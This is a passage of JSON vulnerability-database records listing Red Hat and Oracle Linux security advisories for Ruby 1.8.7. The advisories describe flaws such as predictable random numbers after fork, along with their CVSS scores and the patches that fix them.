"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-0188", "CVE-2011-2705", "CVE-2012-4522", "CVE-2013-0256", "CVE-2013-2065", "CVE-2015-1855"], "modified": "2022-07-07T00:25:25", "id": "OSV:DLA-235-1", "href": "https://osv.dev/vulnerability/DLA-235-1", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2021-10-21T04:45:55", "description": "Ruby is an extensible, interpreted, object-oriented, scripting language. It\nhas features to process text files and to do system management tasks.\n\nIt was found that Ruby did not reinitialize the PRNG (pseudorandom number\ngenerator) after forking a child process. This could eventually lead to the\nPRNG returning the same result twice. An attacker keeping track of the\nvalues returned by one child process could use this flaw to predict the\nvalues the PRNG would return in other child processes (as long as the\nparent process persisted). (CVE-2011-3009)\n\nA flaw was found in the Ruby SecureRandom module. When using the\nSecureRandom.random_bytes class, the PRNG state was not modified after\nforking a child process. This could eventually lead to\nSecureRandom.random_bytes returning the same string more than once. An\nattacker keeping track of the strings returned by one child process could\nuse this flaw to predict the strings SecureRandom.random_bytes would return\nin other child processes (as long as the parent process persisted).\n(CVE-2011-2705)\n\nThis update also fixes the following bugs:\n\n* The ruby package has been upgraded to upstream point release 1.8.7-p352,\nwhich provides a number of bug fixes over the previous version. (BZ#706332)\n\n* The MD5 message-digest algorithm is not a FIPS-approved algorithm.\nConsequently, when a Ruby script attempted to calculate an MD5 checksum in\nFIPS mode, the interpreter terminated unexpectedly. This bug has been fixed\nand an exception is now raised in the described scenario. (BZ#717709)\n\n* Due to inappropriately handled line continuations in the mkconfig.rb\nsource file, an attempt to build the ruby package resulted in unexpected\ntermination. An upstream patch has been applied to address this issue and\nthe ruby package can now be built properly. (BZ#730287)\n\n* When the 32-bit ruby-libs library was installed on a 64-bit machine, the\nmkmf library failed to load various modules necessary for building\nRuby-related packages. This bug has been fixed and mkmf now works properly\nin the described scenario. (BZ#674787)\n\n* Previously, the load paths for scripts and binary modules were duplicated\non the i386 architecture. Consequently, an ActiveSupport test failed. With\nthis update, the load paths are no longer stored in duplicates on the i386\narchitecture. (BZ#722887)\n\nThis update also adds the following enhancement:\n\n* With this update, SystemTap probes have been added to the ruby package.\n(BZ#673162)\n\nAll users of ruby are advised to upgrade to these updated packages, which\nresolve these issues and add this enhancement.\n", "cvss3": {}, "published": "2011-12-06T00:00:00", "type": "redhat", "title": "(RHSA-2011:1581) Low: ruby security, bug fix, and enhancement update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2705", "CVE-2011-3009"], "modified": "2018-06-06T16:24:07", "id": "RHSA-2011:1581", "href": "https://access.redhat.com/errata/RHSA-2011:1581", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:38:31", "description": "[1.8.7.352-3]\n- mkconfig.rb: fix for continued lines.\n * ruby-1.8.7-p352-mkconfig.rb-fix-for-continued-lines.patch\n- Resolves: rhbz#730287\n[1.8.7.352-2]\n- Fix of ruby interpreter crash in FIPS mode.\n * ruby-1.8.7-FIPS.patch\n- Resolves: rhbz#717709\n[1.8.7.352-1]\n- Update to Ruby 1.8.7-p352.\n * Remove Patch43: ruby-1.8.7-CVE-2011-1004.patch; subsumed\n * Remove Patch44: ruby-1.8.7-CVE-2011-1005.patch; subsumed\n * Remove Patch200: ruby-1.8.7-webrick-CVE.patch; subsumed\n- Resolves: rhbz#706332\n- Fix of conflict between 32bit and 64bit library versions.\n- Resolves: rhbz#674787\n- Add systemtap static probes.\n- Resolves: rhbz#673162\n- Remove duplicate path entry\n- Resolves: rhbz#722887\n[1.8.7.299-8]\n- Address CVE-2011-1004 'Symlink race condition by removing directory trees in\n fileutils module'\n * ruby-1.8.7-CVE-2011-1004.patch\n- Address CVE-2011-1005 'Untrusted codes able to modify arbitrary strings'\n * ruby-1.8.7-CVE-2011-1005.patch\n- Address CVE-2011-0188 'memory corruption in BigDecimal on 64bit platforms'\n * ruby-1.8.7-CVE-2011-0188.patch\n- Resolves: rhbz#709964", "cvss3": {}, "published": "2011-12-14T00:00:00", "type": "oraclelinux", "title": "ruby security, bug fix, and enhancement update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2011-0188", "CVE-2011-2705", "CVE-2011-1005", "CVE-2011-1004", "CVE-2011-3009"], "modified": "2011-12-14T00:00:00", "id": "ELSA-2011-1581", "href": "http://linux.oracle.com/errata/ELSA-2011-1581.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}